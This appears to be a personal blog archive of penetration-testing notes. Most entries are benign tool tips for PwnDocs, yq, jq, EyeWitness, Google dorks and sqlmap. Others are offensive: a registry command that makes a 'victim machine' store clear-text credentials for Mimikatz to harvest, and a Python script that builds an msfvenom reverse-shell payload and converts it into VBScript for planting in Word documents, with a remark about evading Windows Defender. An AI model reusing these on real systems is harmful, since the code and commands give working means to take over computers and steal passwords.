Category Archives: Uncategorized
Deliberately Show Clear-text Credentials in Mimikatz Output
For some demonstration purpose, you might want to show the clear-text passwords from Mimikatz.
Step 1) Run the command below as Admin on victim machine
reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0x00000001
Step 2) Restart the victim machine
Step 3) Run mimikatz, get clear-text credentials.
VBScript Python Script
# This Python script can be used to generate VBScript reverse shell to be implanted in Word documents
# Problem is, Windows defender detects the VBScript as malicious, so I need to find a way to obfuscate further
import subprocess
#Get input for IP Address and listening port
ipaddress = input("Input listening IP Address: ")
lport = input("Input listening port: ")
# Run msfvenom to get a reverse shell VBScript
command1 = [
'msfvenom',
'-p', 'windows/shell_reverse_tcp',
f'LHOST={ipaddress}',
f'LPORT={lport}',
'-f', 'hta-psh',
'-o', '/tmp/rev.hta'
]
subprocess.run(command1)
# Read the content of /tmp/rev.hta, cut it, and grep it
try:
cat_command = subprocess.Popen(['cat', '/tmp/rev.hta'], stdout=subprocess.PIPE)
cut_command = subprocess.Popen(['cut', '-d', '"', '-f', '2'], stdin=cat_command.stdout, stdout=subprocess.PIPE)
grep_command = subprocess.Popen(['grep', 'powershell.exe -nop'], stdin=cut_command.stdout, stdout=subprocess.PIPE)
# Get the output of the last command in the pipeline
output = grep_command.communicate()[0].decode('utf-8')
except subprocess.CalledProcessError as e:
print("Error running the commands:", e)
# Prepare /home/kali/Desktop/reverseshell.vbscript
try:
with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as g:
g.write('Dim Str As String\n')
print('\nreverseshell.vbscript successfully created on /home/kali/Desktop/')
except FileNotFoundError:
print("Error at beginning of script")
# Cut the output of the vbscript to 50 characters per line
# Then input into /home/kali/Desktop/reverseshell.vbscript
n = 50
for i in range(0, len(output), n):
try:
with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as f:
f.write("Str = Str + " + '"' + output[i:i+n] + '"' +'\n')
except FileNotFoundError:
print("The directory does not exist")
f.close()
# Close off reverseshell.vbscript
try:
with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as g:
g.write('\nCreateObject("Wscript.Shell").Run Str')
except FileNotFoundError:
print("Error at end of script")
g.close()
# Delete /tmp/rev.hta
command2 = ['rm', '/tmp/rev.hta']
subprocess.run(command2)
# Print completion status
print('\nScript complete, please cat /home/kali/Desktop/reverseshell.vbscript')
sqlmap POST request
- Intercept a POST request in Burp Suite > right click > Copy to File
- sqlmap -r <filename> -p <parameter to test> –proxy=http://127.0.0.1:8080 –batch
PwnDocs Troubleshooting
- Recompile PwnDocs docker after making changes to javascript
sudo docker-compose down
sudo docker-compose up -d –build
- Troubleshoot errors in PwnDocs
sudo docker container ls
sudo docker container logs <CONTAINER ID>
Installing PwnDocs in Kali
sudo git clone https://github.com/pwndoc/pwndoc.git
sudo apt-get install docker
sudo apt install docker.io
sudo apt-get install npm
sudo apt install docker-compose
sudo mousepad pwndoc/frontend/Dockerfile
Replace “FROM node:lts-alpine” AS build with “FROM node:16-alpine AS build”
cd pwndoc
sudo docker-compose up -d –build
sudo docker-compose start
Access https://localhost:8443 via web browser
Using yq
yq is a YAML parser that can also be used to convert JSON to YAML files
Install into Kali using the following steps
sudo wget https://github.com/mikefarah/yq/releases/download/{version}/yq_linux_amd64 -O /usr/bin/yq
sudo chmod +x /usr/bin/yq
Convert from JSON to YAML using the following command
yq -P file.json
Using jq
jq is used to filter / manipulate JSON files
Install using sudo apt-get install jq
First, ensure that the JSON file starts with something like so:
To pull out specific content, use the following command
cat file.json | jq -r ‘.test[] | .a + “\n” + .ac + “\n” + .affected_hosts + “\n” + .affected_users + “\n”‘
If a field is a number that you want to convert to string
cat file.json | jq -r ‘.test[] | .a + “\n” + .ac + “\n” + .affected_hosts + “\n” + (.affected_users|tostring) + “\n”‘
Website Accessibility Hunting
- Download EyeWitness
- git clone https://github.com/FortyNorthSecurity/EyeWitness
- cd EyeWitness/Python
- Get list of URLs via crt.sh
- sudo dnsrecon –iw -d DOMAIN-t crt | grep “DOMAIN” | cut -d ‘ ‘ -f 4 | sort -u > list.txt
- Inspect list.txt for non-required entries, manually remove (to improve with SED next time)
- Use EyeWitness to scan sites from list.txt, then output to /home/kali/Desktop/DOMAIN/eyewitness/
- ./EyeWitness.py –web -f /home/kali/Desktop/BugBounty/DOMAIN/hosts.txt –user-agent “vdptest” –prepend-https -d /home/kali/Desktop/BugBounty/DOMAIN/urls_eyewitness
- Press “Y” to view the report when prompted
Note if copy pasting commands:
Retype –iw, as — is combined into one long –
Retype ” and ‘ as they do not paste correctly
Google Dorks Tips
site: To force searches into that specific site
inurl: To return only results that have that text in the URL
filetype: to return only results with the specific filetype
-inurl: to remove results that have that text in the URL
Ben's IR Notes 